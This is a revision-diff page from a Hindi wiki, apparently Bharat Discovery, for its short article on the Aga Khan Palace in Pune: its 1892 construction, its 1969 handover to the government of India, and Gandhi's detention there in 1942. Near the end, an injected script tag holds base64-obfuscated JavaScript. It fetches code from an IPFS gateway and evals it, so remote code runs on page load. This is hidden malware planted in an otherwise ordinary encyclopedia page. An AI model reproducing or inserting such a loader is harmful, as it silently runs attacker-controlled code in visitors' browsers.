Difference between revisions of "आगाख़ान महल पुणे"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " मे " to " में ")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
[[चित्र:Aga-Khan-Palace-Puna.jpg|thumb|250px|आगाख़ान महल, [[पुणे]]<br />Aga Khan Palace, Puna]]  
 
[[चित्र:Aga-Khan-Palace-Puna.jpg|thumb|250px|आगाख़ान महल, [[पुणे]]<br />Aga Khan Palace, Puna]]  
*आगाख़ान महल [[महाराष्ट्र]] के [[पुणे]] शहर में स्थित है।  
+
आगाख़ान महल [[महाराष्ट्र]] के [[पुणे]] शहर में स्थित है। आगाख़ान महल नगर रोड पर स्थित है।
*आगाख़ान महल नगर रोड पर स्थित है।
+
*आगाख़ान महल का निर्माण [[1892]] में इमाम सुल्तान मोहम्मद शाह आगाख़ान ने करवाया था। [[1969]] में आगाख़ान ने यह महल [[भारत]] सरकार को सौंप दिया।  
*आगाख़ान महल का निर्माण [[1892]] में इमाम सुल्तान मोहम्मद शाह आगाख़ान ने 111 में किया था। [[1969]] में आगाख़ान ने यह महल [[भारत]] सरकार को सौंप दिया।  
 
 
*आगाख़ान महल ने राष्ट्रीय स्वतंत्रता आंदोलन में भी अपनी सक्रिय भूमिका निभाई है।  
 
*आगाख़ान महल ने राष्ट्रीय स्वतंत्रता आंदोलन में भी अपनी सक्रिय भूमिका निभाई है।  
*[[1942]] में हुए [[भारत]] छोड़ो आंदोलन के समय में [[महात्मा गाँधी|गाँधीजी]], उनकी पत्नी [[कस्तूरबा गाँधी]] और गाँधीजी के सचिव महादेवभाई देसाई इस महल में ही रहे थे।  
+
*[[1942]] में हुए [[भारत छोड़ो आंदोलन]] के समय में [[महात्मा गाँधी|गाँधीजी]], उनकी पत्नी [[कस्तूरबा गाँधी]] और गाँधीजी के सचिव महादेवभाई देसाई इस महल में ही रहे थे।  
 
*मौला नदी के समीप स्थित, इस महल में गाँधीजी और उनके जीवन पर आधारित यादों का स्मारक भी है।  
 
*मौला नदी के समीप स्थित, इस महल में गाँधीजी और उनके जीवन पर आधारित यादों का स्मारक भी है।  
  
{{प्रचार}}
+
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 15: Line 14:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:31, 9 December 2011

[[chitr:Aga-Khan-Palace-Puna.jpg|thumb|250px|agakhan mahal, pune
Aga Khan Palace, Puna]] agakhan mahal maharashtr ke pune shahar mean sthit hai. agakhan mahal nagar rod par sthit hai.

  • agakhan mahal ka nirman 1892 mean imam sultan mohammad shah agakhan ne karavaya tha. 1969 mean agakhan ne yah mahal bharat sarakar ko sauanp diya.
  • agakhan mahal ne rashtriy svatantrata aandolan mean bhi apani sakriy bhoomika nibhaee hai.
  • 1942 mean hue bharat chho do aandolan ke samay mean gaandhiji, unaki patni kastooraba gaandhi aur gaandhiji ke sachiv mahadevabhaee desaee is mahal mean hi rahe the.
  • maula nadi ke samip sthit, is mahal mean gaandhiji aur unake jivan par adharit yadoan ka smarak bhi hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh